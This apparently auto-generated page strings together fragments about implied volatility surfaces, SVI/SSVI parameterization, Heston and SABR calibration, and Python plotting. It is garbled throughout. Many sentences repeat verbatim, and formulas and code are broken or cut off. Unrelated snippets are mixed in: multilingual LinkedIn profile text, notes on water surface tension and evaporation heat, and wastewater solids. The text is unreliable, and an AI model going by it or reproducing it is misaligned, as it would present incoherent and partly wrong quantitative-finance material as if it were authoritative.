asset as a function of strike price and time to maturity is known as the asset's volatility surface. Volatility Surface Explorer - Fetches CBOE options chain data from Yahoo Finance with Pandas Datareader and calculates the implied volatility of each option visualised in a 3D mesh chart. In this project, we introduce an alternative and up to our knowledge new SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. Strikes corresponding to the moneyness levels expressed in delta are available, but at the moment they can only be retrieved using legacy Eikon. In this article, we show how to calibrate the widely used SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. This example shows how to use two different methods to calibrate the SABR stochastic volatility model from market implied Black volatilities. 
Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. • Equity Option Implied Volatility Analytics with Python - Jason Strimpel Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. The rstride and cstride kwargs set the stride used to sample the input data to generate the graph. 15 which shows that the set of conditions which we proved were sufficient are, under two weak con-ditions, necessary properties of an implied volatility surface that is free of static arbitrage. Programming new models and trading tools using several programming languages C++, C#, F#, and Python v. Introduction Heston Model SABR Model Conclusio Derivation of the Heston Model FX Option Volatility Surface Risk Reversal: Risk reversal is the di erence between the volatility of the call price and the put price with the same moneyness levels. Heads up! In the future, we may modify our default styles to better accommodate wide content while keeping the table full-width and responsive. Consultez le profil complet sur LinkedIn et découvrez les relations de Simon, ainsi que des emplois dans des entreprises similaires. The Licenses page details GPL-compatibility and Terms and Conditions. Calibrate the SABR Model. A more effective solution might be to use Quantlib in Python (caveat: I haven't tried it but am confident that QL can do it). For European options, two pricing formula are giving based on the Fourier transform method [ 1 ]. Derivatives risk drivers: Heston arbitrage-free implied volatility surface. Exibir mais Exibir menos. Simon indique 4 postes sur son profil. Bilinear interpolation is used as default; this can be changed by the setInterpolation. Read on to learn how to make those plots. To download the latest trial version of FINCAD Analytics Suite for free, contact a FINCAD Representative. fm October 21, 2006 The Implied Volatility Smile/Surface • Black-Scholes implied volatilities for equity indices: • Term structure of strike and expiration, which change with time and market level. In addition to the actual Monte Carlo algorithm and path generator, I also implemented a simple method for calibrating Heston model to volatility surface by using SciPy optimization package. [2] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. Arco heeft 6 functies op zijn of haar profiel. Put your finger in the water and slowly… i mean “slowly”… pull your finger away and you will see the water is actually attracted to your finger and the water will […]. Page 2 of 30 Stanford. Using the calculator: The following calculation can be done to estimate a stock's potential movement in order to then determine strategy. This makes the term structure SVI surface particularly suitable for pricing exotics under a Dupire local volatility framework. First, let's convert a. The interp1d class in scipy. See the full presentation in the video below:. The rstride and cstride kwargs set the stride used to sample the input data to generate the graph. is a PhD student in the Department of Finance at Budapest University of Technology and Economics in Budapest, Hungary. Considine (1997) and Considine and Heo. 
Implied volatility, a forward-looking and subjective measure, differs from historical volatility because the latter is calculated from known past returns of a security. Existence of implied volatility. Which can for example be found as in the Black76 process. Analysis of tick volatility vs bid-ask implied volatility. Let me first introduce some notation. How do I do two dimensional interpolation?. For European options, two pricing formula are giving based on the Fourier transform method [ 1 ]. plot_surface (X, Y, Z, *args, **kwargs) ¶ Create a surface plot. If 1k by 1k arrays are passed in. The implied volatility described in the Black-Scholes model is the most di cult parameter to understand and it has an important role in the nancial world. Introduction This is equivalent to considering the impact of a parallel shift in the volatility surface. For example, to compare the volatility smiles of the 4 equities at the chosen time expiry (where the maturity value of 1 is the first expiry):. Also, we will fit varying degrees of polynomials to the volatility curves, examine the volatility surface and its sensitivity with respect to the interest rate. Read on to learn how to make those plots. Implied volatility is a dynamic figure that changes based on activity in the options marketplace. Volatility surface can be of many types, for example FX Volatility Surface. Since the Black Scholes equation is a continuous function of volatility on (0, 1) we can use a NAG root finder to locate such volatility*. import plotly. An accurate volatility surface is also very im-portant to futures clearing houses. stochastic volatility inspired, or SVI, model of the implied volatility surface was originally created at Merrill Lynch in 1999 and was introduced to the public in the presentation. Machine learning, deep learning and automation. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. Learn about the essential beginner books for algorithmic trading, machine learning for trading, python basics and much more Learn about Time Series Data Analysis and its applications in Python. This volatility is then denoted as the implied volatility observed in the market. The complete program can be downloaded from my GitHub page. -Hand priced derivative instruments such as credit linked notes, callable bonds, exotic options and various kinds of swaps. y The SABR model and SVI model are investigated to model implied volatilit. Other studies have also commented on the ro-bustness of the spot-volatility correlation. In this article we propose a generalisation of the recent work of Gatheral and Jacquier on explicit arbitrage-free parameterisations of implied volatility surfaces. list in Python’s NLTK package4. In particular, we have seen that volatility (or sigma) is a key input to any option. Bisesti, A. Implied volatility versus time to expiration: The volatility cone shows implied volatility is higher when the option is close to expiry, holding the strike constant. Historical/sample volatility measures. I If we believe in the model, we should expect to get the same implied volatility independent of strike and expiry Implied volatility for S&P 500 index call options. 
The most popular valuation models are those based on the. It provides a minimal example of how to construct the implied volatility surface under the proposed model dynamics. See the full presentation in the video below:. In this article, we show how to calibrate the widely-used SVI parameterization of the implied volatility surface in such a way as to guarantee the absence of static arbitrage. Finance 14, 59–71. And next a plot to compare the mean of the implied volatilities and the fitted volatility: And 2 more plots, one with the RSS vs Std Dev and another with the MSE vs Std Dev. If you found these posts useful, please take a minute by providing some feedback. Resulting in our lovely Surface plot: Smile Curve. We show how this result can help in interpreting SVI parameters. To order reprints of this article, please contact David Rowe at d. x (currently) or PyPy3. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. This class calculates time/strike dependent Black volatilities using as input a matrix of Black volatilities observed in the market. If your cells contain contain text with spaces, then you can overflow your content into multiple lines. 3 Example of a calibrated EURUSD implied volatility surface. The evaporation heat (enthalpy) of water at temperature at 20oC is 2454 kJ/kg. For this implementation example, Heston stochastic volatility model has been used. The mayavi. As can be seen, the model can im-ply a variety of volatility surfaces and hence addresses another shortcoming of the Black-Scholes-Merton model, viz. py3-none-any. 1 *** Failed to import volatility. While similar to other archival material as well as our research found, only the section of volatility surface near the money can be estimated from market prices, the number of parameters to estimate is still quite large. You can see our web tutorials and. Allows predicting the P&L change for any movement in the volatility surface, therefore, hedging more than parallel movements. This means options players are pricing in relatively low volatility. The volatility surface is the three-dimensional surface when we plots the market implied volatilities of European options with different strikes and different maturities. Kim (1990), Jacka (1991) and Carr, Jarrow & Myneni (1992). The implied volatility surface obtained from inverting the Black and Scholes (1973) for-mula is the key input parameter for pricing illiqud, exotic, or other non-listed derivatives consistently with the markets. Kotz´e Financial Chaos Theory Pty. It owes its popularity to two main factors: Firstly, it models both the underlying forward rate and its volatility. Downloadable! In this article we propose a generalisation of the recent work of Gatheral and Jacquier on explicit arbitrage-free parameterisations of implied volatility surfaces. 13 From local volatility to stochastic volatility 14 Introduction to Monte-Carlo pricing methods 15 Final Examination. Given the dynamics of the forward rate, the stochastic instantaneous volatility, and the Black model, we get an algebraic expression that the Black Implied Volatility must satisfy. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. For this implementation example, Heston stochastic volatility model has been used. Gatheral Baruch College, The City University of New York. 
The basic Heston model assumes that S t, the price of the asset, is determined by a stochastic process: = + where , the instantaneous variance, is a CIR process: = (−) + and , are Wiener processes (i. mplot3d import. A crucial property of the implied volatility surface (IVS) is the absence of arbitrage. 2 is an example of implied volatility. Supercharge options analytics and hedging using the power of Python Derivatives Analytics with Python shows you how to implement market-consistent valuation and hedging approaches using advanced financial models, efficient numerical techniques, and the powerful capabilities of the Python programming language. Optimal Delta Hedging for Options I. I have evenly spaced data that is in 3 1-D arrays instead of the 2-D arrays that matplotlib's plot_surface wants. Introduction European option prices are usually quoted in terms of the corresponding implied volatility, and over the last decade a large number of papers (both from practitioners and academics) has focused on understand-. SVI calibration / Zeliade paper. See the complete profile on LinkedIn and discover Jasmeet’s connections and jobs at similar companies. Computing with Data. Contribute to kangzhan/SVI-Surface development by creating an account on GitHub. Given such a set of consistent SSVI parameters, we show that the most natural interpolation. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. se 840428-0292 June 12, 2008. And next a plot to compare the mean of the implied volatilities and the fitted volatility: And 2 more plots, one with the RSS vs Std Dev and another with the MSE vs Std Dev. In this article, we show how to calibrate the widely used SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. Introduction Static arbitrage SVI formulations SSVI Numerics Previous work Calibration of SVI to given implied volatility data (for example [12]). IV&Greeks for option trades. , a set of 3 SSVI parameters $$\theta _t, \rho _t, \varphi _t$$ attached to each option maturity t available on the market), which grants that these slices are free of butterfly and of calendar spread arbitrage. y The performance of the. The calculation is performed interpolating on the variance surface. Below is Python code that shows how to plot the implied volatility surface with both time to expiration and strike price as features. Visit here for other QuantLib Python examples. Traders monitor movements in volatility surfaces closely. Brian Spector of NAG discussed a technique and script for calculating implied volatility for option prices in the Black-Sholes formula using Pandas and nag4py. Surface plots¶ Axes3D. Supercharge options analytics and hedging using the power of Python Derivatives Analytics with Python shows you how to implement market-consistent valuation and hedging approaches using advanced financial models, efficient numerical techniques, and the powerful capabilities of the Python programming language. Modeling Volatility Smile and Heston Model Calibration Using QuantLib Python: Provides an introduction to constructing implied volatility surface consistend with the smile observed in the. 3D surface (color map) ¶ Demonstrates plotting a 3D surface colored with the coolwarm color map. Front Arena, Adaptiv, Bloomberg and. y The performance of the. [2] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. 
Vega map: sensitivity by buckets (maturities and strikes). One of the points to take home is that it is not a constant, as it would be implied by geometric Brownian motion model of Black and Scholes. Two Stochastic Volatility Processes - American Option Pricing. The mayavi. Plotting Volatility Smile in Python. Constraints on implied volatility surface. Surface tension is easily demonstrated by observing a pool of water. The ones detailing QC API in its Python flavor are particularly helpful, thank you Jing Wu!. Ask Question Asked 4 years, 5 months ago. Black-Scholes, Heston, SABR, implied, volatility, local volatility, surface, Risk model, Credit risk, Market risk, hedge, trading, algorithm, automatic, Stochastic. I have also worked on models used to construct the yield curve, Black volatility surface and total return volatility surface. The crosses on the surface correspond to market quoted mids. The SABR model is like the Vega/Vanna Volga Approach, in that it is a method of interpolating the implied volatility surface. I The volatility ˙is a parameter of the model for the stock (the Black-Scholes model), and not of the option contract. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. Programming new models and trading tools using several programming languages C++, C#, F#, and Python v. We demonstrate the high quality of typical SVI fits with a numerical example using data from finance. Implied volatility, a forward-looking and subjective measure, differs from historical volatility because the latter is calculated from known past returns of a security. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. ARCH/GARCH Models. Conceptually, this is defined as:. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. OptionMetrics is the financial industry’s premier provider of quality historical option price data, tools, and analytics. By assuming that the volatility of the underlying price is a stochastic process rather than a constant, it becomes. A parsimonious arbitrage-free implied volatility parameterization with application to the valuation of volatility derivatives J Gatheral Presentation at Global Derivatives & Risk Management, Madrid, 0 , 2004. Option Pricing Models and Volatility Using Excel-VBA (text only) by F. By using this data, we can calculate the markets 'implied volatility', or level of 'freaking out'. Finance, 14 (2014), pp. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. And next a plot to compare the mean of the implied volatilities and the fitted volatility: And 2 more plots, one with the RSS vs Std Dev and another with the MSE vs Std Dev. Users also gain access to a wide range of calibration options for generating market-consistent valuations. Further, we will illustrate the pricing of a digital option using SVI and compare it to the analytical Black-Scholes price, as well as the fluctuation of this difference with respect to the “moneyness ” of the option Finally a three dimensional volatility surface is constructed via the SVI methodology. This surface is known as the volatility smile. 
The second goal is to investigate whether there is a method which can recover a plausible local volatility surface from a market implied volatility surface. I did not realize how many tutorials are available now. Resulting in our lovely Surface plot: Smile Curve. pi) #-----# Return the value of the Gaussian probability function with mean mu. SSVI is (this may seem. S 0 = 5000; = 5:66; = 0:075;˙= 1:16;ˆ= 0:51; 0 = 0:19;T = 1:7 2000 3000 4000 5000 6000 7000 8000 0. Source Code. Poisson Jump Di usion Model. FINCAD Analytics Suite offers valuation of variance and volatility swaps both with model-independent replication strategies, and within the Heston Model. These features of the implied volatility surface can be reproduced by enhancing the Black-Scholes model (1. Asymptotic formulae for implied volatility in the Heston model∗ Martin Forde† Antoine Jacquier‡ Aleksandar Mijatovi´c§ Abstract In this paper we prove an approximate formula expressed in terms of elementary functions for the implied volatility in the Heston model. Arbitrage-free interpolation of implied volatilities by [1], [3], [8], [10]. Learn types, components, decomposing, forecasting, calculating, plotting and validating Time Series. essvi implied volatility surface white paper We accomplish this by implementing the eSSVI volatility surface, which is an extension of the well-known SVI parametrization of the volatility smile. The rest of the volatility surface is typically determined by interpolating between these points. For example, to compare the volatility smiles of the 4 equities at the chosen time expiry (where the maturity value of 1 is the first expiry):. 1; Filename, size File type Python version Upload date Hashes; Filename, size py_implied_vol-0. GENERALIZED ARBITRAGE-FREE SVI VOLATILITY SURFACES 621 conditionsforagiventwo-dimensionalfunction(ofstrikeandmaturity)tobeaproperimplied volatility surface, i. It is a stylized fact that, at least. One of the points to take home is that it is not a constant, as it would be implied by geometric Brownian motion model of Black and Scholes. 047 kg/s) The energy loss and required heat supply can be reduced by. tuation of the volatility surface. The concept of volatility smile can be extended to options at different maturities to construct a surface. Implied volatility σimp is the volatility value σ that makes the Black-Scholes value of the option equal to the traded price of the option. Implied Volatility index. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. Nowak, Sibetz Volatility Smile. We look into problems related to volatility modelling, focusing on general properties of implied volatility surface and valuation of volatility products. A short-rate model is usually calibrated to some initial structures in the market, typically the initial yield curve, the caps volatility surface, the swaptions volatility surface, and possibly other products, thus determining the model parameters. Volatility surface contains volatilities that are used to price a number of financial trades e. Provides an introduction to constructing implied volatility surface consistend with the smile observed in the market and calibrating Heston model using QuantLib Python. Domestic wastewater volatile solids are about 50% organic, which in turn contaminates the ground and fresh water. The volatility value used here is an estimxate of the future realised price volatility. 
This volatility surface is available from the chain 0#STXEVOLSURF. The fitting of the model, comparing with the other competing parametric models (SVI, SABR), to the implied volatility smile and the. it is the plot of implied volatility across strike and time to maturity. In details we explain these connections in the Chapter 2. Volatility surface can be of many types, for example FX Volatility Surface. surface n We see that as volatility increases • so does volatility of volatility • and so does the volatility skew. The swaption price in cell G1 (screenshot below) is now. Gatheral, J. Note that Cox and Hobson's definition [5] allows for strict local martingales, whereas Roper's framework. To order reprints of this article, please contact David Rowe at d. 1 2 U XX+ ˆ˙ U X + 1 2 ˙2 U + r 1 2 U X + + ( t) 0 t U rU U ˝ = 0 where 0 tis the market price of volatility risk. Further enhancements include an improved pythonic interface and a new. A closed-form solution for options with stochastic volatility. Well, the reason is that I am still using the default volatility surface that has been generated by the wizard as the value for the Vol Table key in range J8:M10. @Thomas K: I can do this: from QuantLib import EuropeanOption I was hoping for an explanation on how to set up a pricing engine for a given method of calculating vol. getservicesids (ImportError: No module named. The basic Heston model assumes that S t, the price of the asset, is determined by a stochastic process: = + where , the instantaneous variance, is a CIR process: = (−) + and , are Wiener processes (i. These models have a large number of parameters that need to be known for pricing purposes and options can be quite sensitive to them. However, if you know the option’s price and all the remaining parameters (underlying price, strike price, interest rate, dividend yield, and time to expiration), you can use the Goal Seek feature in Excel to find it. SVI parametrization of the implied volatility surface. Local vol model in c#. #-----# blackscholes. y The performance of the. Option Analytics & Implied Volatility Surface Manager. We further exhibit an arbitrage-free volatility surface different from Gatheral's SVI. For European options, two pricing formula are giving based on the Fourier transform method [ 1 ]. Implied volatility and option prices. graph of the implied volatility versus the SVI fit where the vertices are not exact fits, but just a little OTM volatilities of both methods give extremely similar results. arbitraging a volatility surface and stressing it without re-adding arbitrages within the scope of the FX market - where the relationship between currencies is con-strained by the triangle rule as well as the usual calendar and butterfly arbitrages. In this article, we show how to calibrate the widely used SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. I implemented the implied volatility surface construction in Python and the script is attached below. Inside this method, process, model and engine are being created. Roger Lee’s moment formula. We do however have a volatility surface for this index defined in terms of tenor and moneyness, which are invariant over time. 
Additionally, the assumption of constant volatility of returns which predicts a at implied volatility surface is unrealistic as it is a well known empirical fact that implied volatility is not constant as a function of strike nor as a function of time to maturity and generally exhibits some skewness commonly referred to as a volatility smile. native python code:) lightweight footprint:) sample data included:(not suited for single / low number of options:(code reads un-pythonic:(not yet thoroughly testedGetting started Requirements. My Articles and Blogs Speed up GJR-GARCH with Numba. is called the implied volatility surface at date , i. (NT) call option data, and to show how volatility traders and investors could use the technique to help identify trading opportunities using volatility. Smile interpolation and calibration of the local volatility model Nabil Kahal´e March 28, 2005 ESCP-EAP, 79 avenue de la R´epublique, 75011 Paris, France, [email protected] 59--71] on explicit arbitrage-free parameterizations of implied volatility surfaces. Developed a new framework for analisys and storage of large market data in Python (HDF5) and MySQL. Where c subscript mkt stands for the market price of the call option. Modeling the Implied Volatility Surface Term Structure with Incomplete Options Market Data The Problem. Gatheral, J. Review of Financial Studies, 6, 327–343. 1 2 U XX+ ˆ˙ U X + 1 2 ˙2 U + r 1 2 U X + + ( t) 0 t U rU U ˝ = 0 where 0 tis the market price of volatility risk. This first one is about Newton’s method, which is an old numerical approximation technique that could be used to find the roots of complex polynomials and any differentiable function. Implied Volatility index. quantlib-python provides the following one- and two-dimensional interpolation methods:. Immediately below are a few examples of 3D plots. We investigate the densities and test market efficiency based on the impact of implied moments on current returns. Introduction Static arbitrage SVI formulations SSVI Numerics Previous work Calibration of SVI to given implied volatility data (for example [12]). Option Analytics & Implied Volatility Surface Manager. py #-----import stdio import sys import math #-----# Return the value of the Gaussian probability function with mean 0. I'm not sure what your argument is otherwise. SSVI is (this may seem. Constraints on implied volatility surface. Topics covered in the tutorial include volatility smile, volatility skew, local volatility and volatility surfaces. exp (-x * x / 2. Speaker: Jason Strimpel (@JasonStrimpel) Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research. ofMathematics Aug2014–Aug2018. Using the calculator: The following calculation can be done to estimate a stock's potential movement in order to then determine strategy. Investment Portfolio Optimization; Based on what I have learned through the course, and also from the above blog posts, I have tried to replicate it in my own way, tweaking bit and pieces along the way. This is an excerpt from the Python Data Science Handbook by Jake VanderPlas; Jupyter notebooks are available on GitHub. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. We do however have a volatility surface for this index defined in terms of tenor and moneyness, which are invariant over time. The rstride and cstride kwargs set the stride used to sample the input data to generate the graph. 
Local Volatility & Monte Carlo Simulation. These models have a large number of parameters that need to be known for pricing purposes and options can be quite sensitive to them. The results in Python are similar to those in Gnu R - However, not the runing time of the programs. Files for py-implied-vol, version 0. Interpolation¶. getservicesids (ImportError: No module named. GARCH is another model for estimating volatility that takes care of volatility clustering issue. Starting from a constant volatility approach, assume that the derivative's underlying asset price follows a standard model for geometric Brownian motion: = + where is the constant drift (i. We also discuss extensively the notion of arbitrage freeness and Roger Lee's moment formula using the recent analysis by Roper. Historical/sample volatility measures. Variance Swap Pricing Analysis Report January 15, 2011 Page 6 of 23. Jim Gatheral’s book, Volatility Surface a practitioner's guide is a great reference. The historic volatility is the movement that did occur. The implied and local volatility surface is derived from the Heston model and therefore the option prices between all models match. [1] showed how to parameterize the volatility surface so as to preclude dynamic arbitrage. plot_surface (X, Y, Z, *args, **kwargs) ¶ Create a surface plot. This paper is devoted to the application of B-splines to volatility modeling, specifically the calibration of the leverage function in stochastic local volatility (SLV) models and the parameterization of an arbitrage-free implied volatility surface calibrated to sparse option data. Shun has 3 jobs listed on their profile. The Volatility & Greeks View presents theoretical information based on and calculated using the Black-Scholes Option Pricing model. Interpolation is one of the most commonly used tools in quantitative finance. In particular, we exhibit a large class of arbitrage-free SVI volatility surfaces with a simple closed-form representation. The concept of volatility smile can be extended to options at different maturities to construct a surface. DataFrame so here is the matplotlib. In this project, we introduce an alternative and up to our knowledge new SVI parameterization of the implied volatility smile in such a way as to guarantee the absence of static arbitrage. We demonstrate the high quality of typical SVI fits with a numerical example using data from finance. Mercurio⁄ 1 Introduction In the foreign exchange (FX) options market away-from-the-money options are quite ac-tively traded, and quotes for the same type of instruments are available everyday with very narrow spreads (at least for the main currencies). This tutorial explains the basics of NumPy such as its. Compute Local Volatility and Implied Volatility Using the Finance Package Fitting Implied Volatility Surface Modeling with Local Volatility Fitting Implied Volatility Surface First let us import prices of SP 500 call options available on October 27,. This section describes the mlab API, for use of Mayavi as a simple plotting in scripts or interactive sessions. When might you use a 3D plot? When you have data with three dimensions-x, y, and z data. Autocallable. Keywords IVP, SVI, gSVI, SABR, arbitrage-free volatility surface, positive semi-definite implied. volatility surface, we want to find the volatility at each grid point. se 840428-0292 June 12, 2008. Instrument Pricing Analytics - Volatility Surfaces. This means options players are pricing in relatively low volatility. 
Two Stochastic Volatility Processes - American Option Pricing. Page 2 of 30 Stanford. In this paper, we show the fragility of widely-used Stochastic Volatility Inspired (SVI) methodology. py #-----import stdio import sys import math #-----# Return the value of the Gaussian probability function with mean 0. 0 Strike Black-Scholes Heston Heston Mean Variance Local Volatility 2000 3000 4000 5000 6000 7000. The implied volatility surface obtained from inverting the Black and Scholes (1973) for-mula is the key input parameter for pricing illiqud, exotic, or other non-listed derivatives consistently with the markets. I just came across this same problem. We recommend you read our Getting Started guide for the latest installation or upgrade instructions, then move on to our Plotly Fundamentals tutorials or dive straight in to some Basic Charts tutorials. Volatility Surface by Moneyness. , to generate arbitrage-free European option prices. Ve el perfil completo en LinkedIn y descubre los contactos y empleos de Ignacio en empresas similares. Further, we will illustrate the pricing of a digital option using SVI and compare it to the analytical Black-Scholes price, as well as the fluctuation of this difference with respect to the “moneyness ” of the option Finally a three dimensional volatility surface is constructed via the SVI methodology. How to construct a volatility surface Aarhus Quant Day 17 jan 2014 Brian Huge Danske Markets Arbitrage-free SVI volatility surfaces, (Working paper 2013) • Hagan, Kumar, Lesniewski and. By assuming that the volatility of the underlying price is a stochastic process rather than a constant, it becomes. On top of the options prices with volumes and open interest, the datasheet contains implied volatility values for each. Heston Stochastic Local Volatility Model Klaus Spanderen1 R/Finance 2016 University of Illinois, Chicago May 20-21, 2016 1Joint work with Johannes Göttker-Schnetmann Klaus Spanderen Heston Stochastic Local Volatility Model 2016-05-20 1 / 19. March 5 2014 - The NAG Library for Python, from the Numerical Algorithms Group, which gives users of the increasingly popular Python language access to over 1,700 mathematical and statistical routines in the NAG Library has been enhanced in-line with Python2. The user can replicate the case studies with the code, also provided. We offer an intuitive and flexible family of nested parametric curves, way beyond standard curves like SSVI and SVI (which we also offer). 0 # and standard deviation 1. László Nagy 1. , to generate arbitrage-free European option prices. Let me first introduce some notation. Teichmann, ETH Zürich. First, let's convert a. The margin requirements for options are based on the volatility surface. Column's A and L are where you can change the strike prices used for the calculations. Market making on Bond Options Volatility (Btps, Bunds, Oats) with accurate modeling of OTC bond options volatility surface. 0 at the given x value. This unique guide offers detailed explanations of all theory, methods, and processes. oFr the rst sec-tion, Quantlab has been the tool for implementation. Heston models prices as also having stochastic volatility. Bilinear interpolation is used as default; this can be changed by the setInterpolation. Erfahren Sie mehr über die Kontakte von Christian Crispoldi und über Jobs bei ähnlichen Unternehmen. 
Fitting the initial volatility surface is only the first step; beyond that, the implied volatility needs proper dynamics:

- future skews determine the price of barriers and OTM cliquets;
- moves of the ATM implied volatility determine the delta of European options;
- calibrating to the current volatility surface alone does not impose these dynamics.

These considerations feed directly into derivatives pricing, market risk, and XVA. To fix notation, the volatility surface σ(K, T) is a function of the strike K and the expiration T. Arbitrage-free interpolation of implied volatilities is treated in [1], [2], [7], [9]. Hybrid models, termed stochastic-local volatility models, combine the local volatility model of Dupire [5] with a stochastic volatility model. For American option pricing, the early-exercise literature goes back to Kim (1990), Jacka (1991) and Carr, Jarrow & Myneni (1992).

On the implementation side, Python has become an increasingly important tool in the domain of quantitative and algorithmic trading and research, as Jason Strimpel (@JasonStrimpel) notes. If you use Python for data science, you have most probably already used Matplotlib, a 2D plotting library that allows you to create publication-quality figures. Firstly, you need to see how the data is structured; here, the source of the implied volatility data is iVolatility.

In the SVI parametrization of the implied volatility surface, the risk drivers are the variables that drive the P&L of each financial instrument and that display a homogeneous behavior over time. The model has two key properties that are often stated in the literature that followed as reasons for its popularity amongst practitioners, and the accompanying figures show the effect of varying ρ.
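As a concrete illustration of the SVI parametrization just discussed, the sketch below implements the raw SVI total-variance formula $w(k) = a + b\,(\rho (k-m) + \sqrt{(k-m)^2 + \sigma^2})$ and calibrates one smile by non-linear least squares with scipy. The synthetic quotes, starting values, and bounds are invented for the example and are not taken from the data sources mentioned in the text.

```python
import numpy as np
from scipy.optimize import least_squares

def svi_total_variance(k, a, b, rho, m, sig):
    """Raw SVI total variance w(k) = a + b*(rho*(k-m) + sqrt((k-m)^2 + sig^2))."""
    return a + b * (rho * (k - m) + np.sqrt((k - m) ** 2 + sig ** 2))

def fit_svi_smile(log_moneyness, total_variance):
    """Calibrate raw SVI parameters to one maturity slice by least squares."""
    def residuals(p):
        a, b, rho, m, sig = p
        return svi_total_variance(log_moneyness, a, b, rho, m, sig) - total_variance

    x0 = np.array([0.02, 0.1, -0.3, 0.0, 0.1])              # rough starting guess
    bounds = ([-1.0, 0.0, -0.999, -1.0, 1e-4],               # keep b >= 0, |rho| < 1, sig > 0
              [1.0, 10.0, 0.999, 1.0, 10.0])
    return least_squares(residuals, x0, bounds=bounds).x

# Synthetic smile: generate quotes from known parameters, then recover them.
k = np.linspace(-0.4, 0.4, 17)
w_market = svi_total_variance(k, a=0.03, b=0.12, rho=-0.4, m=0.02, sig=0.15)
print(fit_svi_smile(k, w_market))   # close to [0.03, 0.12, -0.4, 0.02, 0.15]
```

A pointwise fit like this does not by itself rule out butterfly or calendar arbitrage; that is precisely what the arbitrage-free SVI conditions discussed above are for.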
For the full arbitrage-free construction, see Gatheral and Jacquier (Quantitative Finance). A local volatility model treats volatility as a function both of the current asset level and of time, and the idea of this paper is to present how a specific form of local volatility can be used to fit options on volatility as well as options on the spot. The volatility surface itself is the three-dimensional surface obtained when we plot the market implied volatilities of European options with different strikes and different maturities; an accurate volatility surface is also very important to futures clearing houses.

This is our first post in a multipart series on volatility surfaces, their construction, and their usage in the option-pricing world. Using a finance package, one can compute local volatility and implied volatility and fit the implied volatility surface; for example, one first imports the prices of S&P 500 call options available on October 27. The models implemented include SABR, Heston, lognormal mixture, and arbitrage-free SVI, and the calibration is a non-linear least-squares problem, for which a wrapper around leastsq that overcomes its poor usability is convenient. For visualization, pylab is a module within the matplotlib library that was built to mimic MATLAB's global style, while the mpl_toolkits.mplot3d import registers the 3D projection but is otherwise unused.
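To close the loop on the plotting remarks, here is a short sketch that builds a toy implied-volatility grid, interpolates it bilinearly, and renders it with matplotlib's plot_surface. The grid values are synthetic and the variable names are mine, so treat it as a sketch rather than the workflow of any particular package named in the post.

```python
import numpy as np
import matplotlib.pyplot as plt
# This import registers the 3D projection, but is otherwise unused.
from mpl_toolkits.mplot3d import Axes3D  # noqa: F401
from scipy.interpolate import RegularGridInterpolator

# Toy implied-vol grid: strikes on one axis, maturities on the other.
strikes = np.linspace(80, 120, 9)
maturities = np.array([0.25, 0.5, 1.0, 2.0])
vols = 0.2 + 0.0005 * (strikes[None, :] - 100.0) ** 2 / np.sqrt(maturities[:, None])

# Bilinear interpolation of the discrete grid, mirroring the default mentioned above.
interp = RegularGridInterpolator((maturities, strikes), vols, method="linear")
print(interp([[0.75, 95.0]]))   # interpolated vol at T=0.75, K=95

# Render the surface.
K, T = np.meshgrid(strikes, maturities)
fig = plt.figure()
ax = fig.add_subplot(projection="3d")
ax.plot_surface(K, T, vols, cmap="viridis")
ax.set_xlabel("Strike")
ax.set_ylabel("Maturity (years)")
ax.set_zlabel("Implied volatility")
plt.show()
```

In practice the synthetic grid would be replaced by quotes from a real options chain before fitting a parameterization such as SVI slice by slice.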